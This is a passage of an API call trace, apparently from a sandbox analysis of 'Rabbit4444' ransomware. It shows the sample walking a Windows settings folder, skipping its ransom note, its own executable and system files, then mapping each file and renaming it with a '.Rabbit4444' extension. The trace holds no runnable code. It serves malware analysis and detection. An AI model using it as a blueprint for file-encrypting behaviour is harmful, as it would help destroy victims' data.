(lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Proxy_ManualProxyAddress.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_proxy_manualproxyaddress.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.942] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.942] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14925309593) returned 1 [0057.942] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1249) returned 1 [0057.942] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0057.942] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101408 [0057.943] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7f0, lpName=0x0) returned 0x298 [0057.944] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7f0) returned 0x70000 [0057.945] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.945] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0057.945] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.945] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0057.945] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.945] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0057.945] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.945] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0057.945] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14925581232) returned 1 [0057.945] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0057.945] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101408 | out: hHeap=0xe0000) returned 1 [0057.945] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.945] CloseHandle (hObject=0x298) returned 1 [0057.945] CloseHandle (hObject=0x278) returned 1 [0057.945] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Proxy_ManualProxyAddress.settingcontent-ms.Rabbit4444") returned 189 [0057.945] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Proxy_ManualProxyAddress.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_proxy_manualproxyaddress.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Proxy_ManualProxyAddress.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_proxy_manualproxyaddress.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.946] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x371079e6, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x371079e6, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x238f74d9, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4c0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Radio_DeviceList.settingcontent-ms", cAlternateFileName="AAD669~1.SET")) returned 1 [0057.946] lstrcmpiW (lpString1="AAA_SystemSettings_Radio_DeviceList.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.946] lstrcmpiW (lpString1="AAA_SystemSettings_Radio_DeviceList.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.946] lstrcmpiW (lpString1="AAA_SystemSettings_Radio_DeviceList.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.946] lstrcmpiW (lpString1="AAA_SystemSettings_Radio_DeviceList.settingcontent-ms", lpString2=".") returned 1 [0057.946] lstrcmpiW (lpString1="AAA_SystemSettings_Radio_DeviceList.settingcontent-ms", lpString2="..") returned 1 [0057.946] lstrcmpiW (lpString1="AAA_SystemSettings_Radio_DeviceList.settingcontent-ms", lpString2="windows") returned -1 [0057.946] lstrcmpiW (lpString1="AAA_SystemSettings_Radio_DeviceList.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.946] lstrcmpiW (lpString1="AAA_SystemSettings_Radio_DeviceList.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.946] lstrcmpiW (lpString1="AAA_SystemSettings_Radio_DeviceList.settingcontent-ms", lpString2="boot") returned -1 [0057.946] lstrcmpiW (lpString1="AAA_SystemSettings_Radio_DeviceList.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.946] lstrcmpiW (lpString1="AAA_SystemSettings_Radio_DeviceList.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.947] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Radio_DeviceList.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Radio_DeviceList.settingcontent-ms") returned="AAA_SystemSettings_Radio_DeviceList.settingcontent-ms" [0057.947] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Radio_DeviceList.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.947] lstrlenW (lpString="AAA_SystemSettings_Radio_DeviceList.settingcontent-ms") returned 53 [0057.947] lstrlenW (lpString="Rabbit4444") returned 10 [0057.947] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.947] lstrlenW (lpString=".dll") returned 4 [0057.947] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.947] lstrlenW (lpString=".lnk") returned 4 [0057.947] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.947] lstrlenW (lpString=".ini") returned 4 [0057.947] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.947] lstrlenW (lpString=".sys") returned 4 [0057.947] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.947] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Radio_DeviceList.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_radio_devicelist.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.947] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.947] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14925826424) returned 1 [0057.948] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1216) returned 1 [0057.948] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0057.948] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c88 [0057.948] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7c0, lpName=0x0) returned 0x298 [0057.949] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7c0) returned 0x70000 [0057.950] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.950] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0057.950] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.950] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0057.950] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.950] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0057.950] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.950] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0057.950] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14926076844) returned 1 [0057.950] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0057.950] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c88 | out: hHeap=0xe0000) returned 1 [0057.950] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.950] CloseHandle (hObject=0x298) returned 1 [0057.950] CloseHandle (hObject=0x278) returned 1 [0057.950] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Radio_DeviceList.settingcontent-ms.Rabbit4444") returned 181 [0057.950] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Radio_DeviceList.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_radio_devicelist.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Radio_DeviceList.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_radio_devicelist.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.951] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x374c14d3, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x374c14d3, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a287a5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4f7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Radio_IsAirplaneModeEnabled.settingcontent-ms", cAlternateFileName="AA2A0A~1.SET")) returned 1 [0057.951] lstrcmpiW (lpString1="AAA_SystemSettings_Radio_IsAirplaneModeEnabled.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.951] lstrcmpiW (lpString1="AAA_SystemSettings_Radio_IsAirplaneModeEnabled.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.951] lstrcmpiW (lpString1="AAA_SystemSettings_Radio_IsAirplaneModeEnabled.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.951] lstrcmpiW (lpString1="AAA_SystemSettings_Radio_IsAirplaneModeEnabled.settingcontent-ms", lpString2=".") returned 1 [0057.951] lstrcmpiW (lpString1="AAA_SystemSettings_Radio_IsAirplaneModeEnabled.settingcontent-ms", lpString2="..") returned 1 [0057.951] lstrcmpiW (lpString1="AAA_SystemSettings_Radio_IsAirplaneModeEnabled.settingcontent-ms", lpString2="windows") returned -1 [0057.951] lstrcmpiW (lpString1="AAA_SystemSettings_Radio_IsAirplaneModeEnabled.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.951] lstrcmpiW (lpString1="AAA_SystemSettings_Radio_IsAirplaneModeEnabled.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.951] lstrcmpiW (lpString1="AAA_SystemSettings_Radio_IsAirplaneModeEnabled.settingcontent-ms", lpString2="boot") returned -1 [0057.951] lstrcmpiW (lpString1="AAA_SystemSettings_Radio_IsAirplaneModeEnabled.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.951] lstrcmpiW (lpString1="AAA_SystemSettings_Radio_IsAirplaneModeEnabled.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.951] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Radio_IsAirplaneModeEnabled.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Radio_IsAirplaneModeEnabled.settingcontent-ms") returned="AAA_SystemSettings_Radio_IsAirplaneModeEnabled.settingcontent-ms" [0057.951] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Radio_IsAirplaneModeEnabled.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.952] lstrlenW (lpString="AAA_SystemSettings_Radio_IsAirplaneModeEnabled.settingcontent-ms") returned 64 [0057.952] lstrlenW (lpString="Rabbit4444") returned 10 [0057.952] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.952] lstrlenW (lpString=".dll") returned 4 [0057.952] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.952] lstrlenW (lpString=".lnk") returned 4 [0057.952] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.952] lstrlenW (lpString=".ini") returned 4 [0057.952] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.952] lstrlenW (lpString=".sys") returned 4 [0057.952] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.952] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Radio_IsAirplaneModeEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_radio_isairplanemodeenabled.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.952] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.952] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14926315947) returned 1 [0057.952] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1271) returned 1 [0057.953] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0057.953] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c00 [0057.953] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x800, lpName=0x0) returned 0x298 [0057.954] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x800) returned 0x70000 [0057.955] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.955] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0057.955] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.955] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0057.955] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.955] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0057.955] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.955] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0057.955] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14926593814) returned 1 [0057.955] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0057.955] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c00 | out: hHeap=0xe0000) returned 1 [0057.955] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.955] CloseHandle (hObject=0x298) returned 1 [0057.955] CloseHandle (hObject=0x278) returned 1 [0057.955] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Radio_IsAirplaneModeEnabled.settingcontent-ms.Rabbit4444") returned 192 [0057.956] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Radio_IsAirplaneModeEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_radio_isairplanemodeenabled.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Radio_IsAirplaneModeEnabled.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_radio_isairplanemodeenabled.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.956] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3763ebfa, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3763ebfa, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a74c5a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4ed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_ShellMode_ModeChangeConfig.settingcontent-ms", cAlternateFileName="AA1166~1.SET")) returned 1 [0057.956] lstrcmpiW (lpString1="AAA_SystemSettings_ShellMode_ModeChangeConfig.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.956] lstrcmpiW (lpString1="AAA_SystemSettings_ShellMode_ModeChangeConfig.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.956] lstrcmpiW (lpString1="AAA_SystemSettings_ShellMode_ModeChangeConfig.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.956] lstrcmpiW (lpString1="AAA_SystemSettings_ShellMode_ModeChangeConfig.settingcontent-ms", lpString2=".") returned 1 [0057.956] lstrcmpiW (lpString1="AAA_SystemSettings_ShellMode_ModeChangeConfig.settingcontent-ms", lpString2="..") returned 1 [0057.956] lstrcmpiW (lpString1="AAA_SystemSettings_ShellMode_ModeChangeConfig.settingcontent-ms", lpString2="windows") returned -1 [0057.956] lstrcmpiW (lpString1="AAA_SystemSettings_ShellMode_ModeChangeConfig.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.957] lstrcmpiW (lpString1="AAA_SystemSettings_ShellMode_ModeChangeConfig.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.957] lstrcmpiW (lpString1="AAA_SystemSettings_ShellMode_ModeChangeConfig.settingcontent-ms", lpString2="boot") returned -1 [0057.957] lstrcmpiW (lpString1="AAA_SystemSettings_ShellMode_ModeChangeConfig.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.957] lstrcmpiW (lpString1="AAA_SystemSettings_ShellMode_ModeChangeConfig.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.957] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_ShellMode_ModeChangeConfig.settingcontent-ms" | out: lpString1="AAA_SystemSettings_ShellMode_ModeChangeConfig.settingcontent-ms") returned="AAA_SystemSettings_ShellMode_ModeChangeConfig.settingcontent-ms" [0057.957] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_ShellMode_ModeChangeConfig.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.957] lstrlenW (lpString="AAA_SystemSettings_ShellMode_ModeChangeConfig.settingcontent-ms") returned 63 [0057.957] lstrlenW (lpString="Rabbit4444") returned 10 [0057.957] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.957] lstrlenW (lpString=".dll") returned 4 [0057.957] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.957] lstrlenW (lpString=".lnk") returned 4 [0057.957] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.957] lstrlenW (lpString=".ini") returned 4 [0057.957] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.957] lstrlenW (lpString=".sys") returned 4 [0057.957] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.957] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_ShellMode_ModeChangeConfig.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_shellmode_modechangeconfig.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.958] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.958] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14926834145) returned 1 [0057.958] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1261) returned 1 [0057.958] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0057.958] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0057.958] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7f0, lpName=0x0) returned 0x298 [0057.959] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7f0) returned 0x70000 [0057.960] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.960] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0057.960] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.960] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0057.960] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.960] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0057.960] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.960] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0057.960] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14927082069) returned 1 [0057.960] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0057.960] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0057.960] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.960] CloseHandle (hObject=0x298) returned 1 [0057.960] CloseHandle (hObject=0x278) returned 1 [0057.960] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_ShellMode_ModeChangeConfig.settingcontent-ms.Rabbit4444") returned 191 [0057.960] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_ShellMode_ModeChangeConfig.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_shellmode_modechangeconfig.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_ShellMode_ModeChangeConfig.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_shellmode_modechangeconfig.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.961] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37d8bf38, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x37d8bf38, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a74c5a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4cf, dwReserved0=0xa0000003, dwReserved1=0x0, 